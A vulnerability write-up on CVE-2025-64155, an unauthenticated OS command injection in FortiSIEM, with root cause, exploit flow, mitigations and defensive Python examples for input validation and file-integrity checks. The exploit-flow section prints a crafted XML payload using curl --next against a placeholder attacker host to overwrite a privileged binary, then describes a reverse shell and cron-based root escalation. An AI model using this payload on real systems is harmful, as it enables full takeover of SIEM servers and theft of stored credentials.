Overview
On 16 January 2026, security researchers at Horizon3.ai released a detailed analysis of a critical vulnerability in Fortinet’s Security Information and Event Management (SIEM) platform – FortiSIEM. Assigned CVE‑2025‑64155, the flaw is an OS command injection (CWE‑78) residing in the web‑based handleStorageRequest handler. Exploitation does not require authentication and can be performed remotely against any publicly reachable FortiSIEM instance.
The vulnerability enables an attacker to inject malicious arguments into a curl call executed by the internal elastic_test_url.sh script. By chaining the obscure --next flag, a crafted XML payload can overwrite the privileged phLicenseTool binary, which runs every few seconds under the admin account. The overwritten binary spawns a reverse shell, giving the attacker admin‑level code execution. A subsequent cron‑job abuse elevates the session to root, delivering full system compromise of the SIEM server.
Technical Details
CVE Information
- CVE‑2025‑64155 – OS command injection in FortiSIEM’s web interface (CWE‑78)
- Vendor: Fortinet
- Vulnerability ID (Fortinet): FG‑IR‑25‑772
- Affected versions: 7.2.0 – 7.2.5 (all deployment models)
- Fixed in: 7.2.6, 7.3.2, 7.4.0 and later releases
Root Cause
The vulnerable code path resides in phMonitorProcess::initEventHandler, specifically the handleStorageRequest function handling the elastic storage type. User‑controlled XML elements <cluster_name> and <cluster_url> are concatenated into a shell command that ultimately invokes:
execve("/opt/phoenix/phscripts/bin/elastic_test_url.sh", ["elastic_test_url.sh", ]);
Although the script attempts to sanitize input using subprocess.run() and wrapShellToken, the underlying curl command is built as a literal string. The --next flag, introduced in curl 7.68, permits the attacker to append a second request, effectively turning the single URL argument into a command chain.
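To make the root cause concrete, here is an added illustration (not FortiSIEM's script nor Horizon3.ai's code) of the weak pattern the write‑up describes next to a hardened form: the weak version interpolates the caller‑supplied URL into one command string that is then word‑split, so a value containing spaces becomes several curl arguments; the hardened version validates that the value is exactly one http(s) URL and passes it as a single argv element. The curl options, the placeholder paths and the 203.0.113.x host are constructed for the example.

```python
import shlex
from urllib.parse import urlsplit

# Illustrative re-creation (not FortiSIEM's code) of the weak pattern: the
# caller-supplied URL is interpolated into one command string and then split
# shell-style, so curl receives "--next" and "-o" as separate options.
def build_curl_vulnerable(cluster_url: str) -> list[str]:
    cmd = f"curl -s -o /dev/null -w '%{{http_code}}' {cluster_url}"
    return shlex.split(cmd)


class InvalidClusterUrl(ValueError):
    """Raised when <cluster_url> is not exactly one plain http(s) URL."""


def validate_cluster_url(value: str) -> str:
    # A URL never contains whitespace; its presence means extra tokens.
    if not value or any(ch.isspace() for ch in value):
        raise InvalidClusterUrl("empty value or embedded whitespace")
    # Anything starting with "-" could be parsed by curl as an option.
    if value.startswith("-"):
        raise InvalidClusterUrl("value looks like a command-line option")
    parts = urlsplit(value)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise InvalidClusterUrl("not an http(s) URL with a host")
    return value


def build_curl_hardened(cluster_url: str) -> list[str]:
    # argv list, no shell: the URL stays one argument whatever it contains;
    # "--" additionally tells curl to stop option parsing.
    url = validate_cluster_url(cluster_url)
    return ["curl", "-s", "-o", "/dev/null", "-w", "%{http_code}", "--", url]


def is_accepted(cluster_url: str) -> bool:
    """True if the hardened path accepts the value, False if it is rejected."""
    try:
        build_curl_hardened(cluster_url)
        return True
    except InvalidClusterUrl:
        return False


if __name__ == "__main__":
    # Constructed sample mirroring the shape of the payload in the write-up,
    # with a documentation-range address standing in for the attacker host.
    hostile = "http://203.0.113.9:9200 --next -o /tmp/example http://203.0.113.9:9200"
    print(build_curl_vulnerable(hostile))   # "--next" appears as its own token
    print(is_accepted(hostile), is_accepted("https://es.internal:9200"))
```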
Exploit Flow
- Payload Delivery: An unauthenticated HTTP POST to /phmonitor/api/v1/storage with a crafted XML body:
  <request> <type>elastic</type> <cluster_name>any</cluster_name> <cluster_url>http://attacker:9200 --next -o /opt/phoenix/bin/phLicenseTool http://attacker:9200</cluster_url></request>
- File Overwrite: The curl --next sequence downloads the attacker‑controlled binary and writes it over phLicenseTool, a privileged utility executed by the admin user every 30 seconds.
- Admin Shell: The overwritten phLicenseTool launches a reverse shell to the attacker’s listener, granting a foothold with admin privileges.
- Root Escalation: The attacker modifies the root‑only cron job /etc/cron.d/fsm-c (installed by FortiSIEM for health checks) to execute a malicious script as root. Within minutes the reverse shell is upgraded to a full root session.
Impact Analysis
The vulnerability is classified as Critical (CVSS v3.1 base score 9.8) because it satisfies the following criteria:
- Unauthenticated Network‑Accessible Attack Vector – No credentials are needed.
- Complete System Compromise – Attack leads to remote code execution as admin and subsequent root privilege escalation.
- Wide Deployment Base – FortiSIEM is used by large enterprises, MSSPs, and government agencies worldwide.
Successful exploitation gives an attacker full visibility into all collected logs, the ability to tamper with alerts, and the power to pivot laterally across the network using the compromised SIEM as a trusted data source.
Timeline of Events
- July 2025 – Initial internal discovery of a command injection in the phMonitor service (CVE‑2025‑25256).
- August 2025 – Fortinet issues advisory for CVE‑2025‑25256.
- September 2025 – Horizon3.ai publishes research on a second‑order injection (CVE‑2024‑23108).
- 12 January 2026 – First public proof‑of‑concept for CVE‑2025‑64155 appears on GitHub.
- 16 January 2026 – Horizon3.ai releases full technical write‑up; Fortinet assigns CVE‑2025‑64155 (FG‑IR‑25‑772) and releases emergency patches for 7.2.0‑7.2.5.
- 17 January 2026 – CISA adds the vulnerability to its “Known Exploited Vulnerabilities” (KEV) catalog (pending at time of writing).
Mitigation & Recommendations
Organizations running FortiSIEM should act immediately. The following steps are recommended:
- Patch Immediately: Upgrade to FortiSIEM 7.2.6 or later. For all‑in‑one deployments, apply the cumulative patch package; for supervisor‑collector architectures, patch both components.
- Network Segmentation: Restrict access to the /phmonitor/api endpoint to trusted management subnets. Use firewalls or Web Application Firewalls (WAF) to block unauthenticated traffic.
- Input Validation: If patching cannot be performed within 48 hours, implement a reverse‑proxy that sanitizes XML payloads, stripping or escaping the --next flag and any characters that could break command boundaries.
- File Integrity Monitoring: Deploy FIM solutions (e.g., OSSEC, Tripwire) to watch critical binaries such as /opt/phoenix/bin/phLicenseTool. Alert on any changes.
- Audit Cron Jobs: Review /etc/cron.d/fsm-c and other FortiSIEM‑installed cron files for unexpected entries. Remove write permissions for non‑root users.
- Log Monitoring: Enable real‑time alerting for outbound connections from the SIEM server to unknown IPs, especially on uncommon ports.
- Incident Response Preparedness: Ensure your IR team has a playbook for SIEM compromise, including isolation, forensic imaging, and credential rotation.
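The file‑integrity and cron‑audit steps above can be scripted where a full FIM product is not yet in place. The following is an added example (not FortiSIEM's tooling nor Horizon3.ai's code): it baselines a watched binary by SHA‑256 and reports changes, and it flags /etc/cron.d‑style entries whose program lives outside an expected directory. The /opt/phoenix prefix as the "expected" tree, the cron file contents and the stand‑in binary are constructed for the example.

```python
import hashlib
import os
import re
import tempfile

def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def changed_files(baseline: dict[str, str]) -> list[str]:
    """Paths whose current digest differs from the recorded one, or that vanished."""
    return [p for p, digest in baseline.items()
            if not os.path.isfile(p) or sha256_file(p) != digest]

# /etc/cron.d format: five time fields, the user, then the command.
CRON_LINE = re.compile(r"^(\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")

# Assumption for this example: FortiSIEM's own cron commands live under /opt/phoenix.
def suspicious_cron_entries(text: str, allowed=("/opt/phoenix/",)) -> list[str]:
    """Entries whose program is outside the expected tree, or that do not parse."""
    hits = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                        # blank, comment or VAR=value line
        m = CRON_LINE.match(line)
        if m is None or not m.group("cmd").split()[0].startswith(allowed):
            hits.append(line)               # unparseable or unexpected program
    return hits

def demo() -> tuple[list[str], list[str]]:
    # Constructed stand-in for the watched binary: baseline it, then overwrite it.
    with tempfile.TemporaryDirectory() as d:
        tool = os.path.join(d, "phLicenseTool")
        with open(tool, "wb") as f:
            f.write(b"original vendor binary (constructed)")
        baseline = {tool: sha256_file(tool)}
        with open(tool, "wb") as f:
            f.write(b"replaced content (constructed)")
        fim_hits = [os.path.basename(p) for p in changed_files(baseline)]
    # Constructed cron.d content: one expected entry, one that should not be there.
    cron_text = (
        "SHELL=/bin/bash\n"
        "*/5 * * * * root /opt/phoenix/phscripts/bin/health_check.sh\n"
        "* * * * * root /tmp/.cache/update.sh\n"
    )
    return fim_hits, suspicious_cron_entries(cron_text)
```

Calling demo() returns the changed binary name and the unexpected cron entry; in production the baseline digests would be recorded right after a clean install or patch and kept off‑host.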
Real‑World Impact
Beyond the immediate system takeover, the compromise of a SIEM has strategic implications:
- Log Tampering: Attackers can delete or modify logs to hide lateral movement, making post‑incident forensics significantly harder.
- False Alerts: By injecting fabricated events, adversaries can generate alert fatigue or mask genuine malicious activity.
- Credential Harvesting: FortiSIEM stores API keys, service accounts, and LDAP bind credentials. Access to these assets can be leveraged to infiltrate downstream services.
- Supply‑Chain Risks: MSSPs that manage FortiSIEM for multiple customers could inadvertently spread the breach across many tenants.
Enterprises that rely on FortiSIEM for compliance reporting (PCI‑DSS, HIPAA, GDPR) may also face regulatory fallout if the compromise leads to data loss or non‑compliance.
Expert Opinion
From a strategic standpoint, CVE‑2025‑64155 underscores a recurring theme in modern security platforms: the concentration of privileged functionality behind thinly‑protected APIs. FortiSIEM’s reliance on the legacy phMonitor service, which processes unauthenticated XML messages, creates a large attack surface that is difficult to harden retroactively.
While Fortinet’s rapid patch release is commendable, the fact that the exploit chain does not stop at the initial admin shell but escalates to root suggests deeper architectural flaws. Organizations should view this not only as a patching exercise but as a prompt to reevaluate the trust model of their SIEM deployments. Moving towards zero‑trust segmentation, employing signed binaries for critical utilities, and adopting runtime application self‑protection (RASP) can mitigate similar future threats.
In the broader industry context, this vulnerability may accelerate the shift from on‑prem SIEMs to cloud‑native security analytics platforms that enforce stronger API authentication and isolation. However, any platform that processes rich data formats (XML, JSON) must rigorously validate input at the edge to prevent command injection vectors.